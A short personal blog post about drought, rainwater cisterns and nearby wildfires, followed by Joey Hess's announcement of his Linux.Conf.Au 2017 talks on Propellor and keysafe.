Drought here since August. The small cistern ran dry a month ago, which has never happened before. The large cistern was down to some 900 gallons. I don't use anywhere near the national average of 400 gallons per day. More like 10 gallons. So could have managed for a few more months. Still, this was worrying, especially as the area moved from severe to extreme drought according to the US Drought Monitor. Two days of solid rain fixed it, yay! The small cistern has already refilled, and the large will probably be full by tomorrow. The winds preceeding that same rain storm fanned the flames that destroyed Gatlinburg. Earlier, fire got within 10 miles of here, although that may have been some kind of controlled burn. Climate change is leading to longer duration weather events in this area. What tended to be a couple of dry weeks in the fall, has become multiple months of drought and weeks of fire. What might have been a few days of winter weather and a few inches of snow before the front moved through has turned into multiple weeks of arctic air, with multiple 1 ft snowfalls. What might have been a few scorching summer days has become a week of 100-110 degree temperatures. I've seen all that over the past several years. After this, I'm adding "additional, larger cistern" to my todo list. Also "larger fire break around house".

16 November 2016

Joey Hess: Linux.Conf.Au 2017 presentation on Propellor

On January 18th, I'll be presenting "Type driven configuration management with Propellor" at Linux.Conf.Au in Hobart, Tasmania. Abstract Linux.Conf.Au is a wonderful conference, and I'm thrilled to be able to attend it again. -- Update: My presentation on keysafe has also been accepted for the Security MiniConf at LCA, January 17th.

Next.

Previous.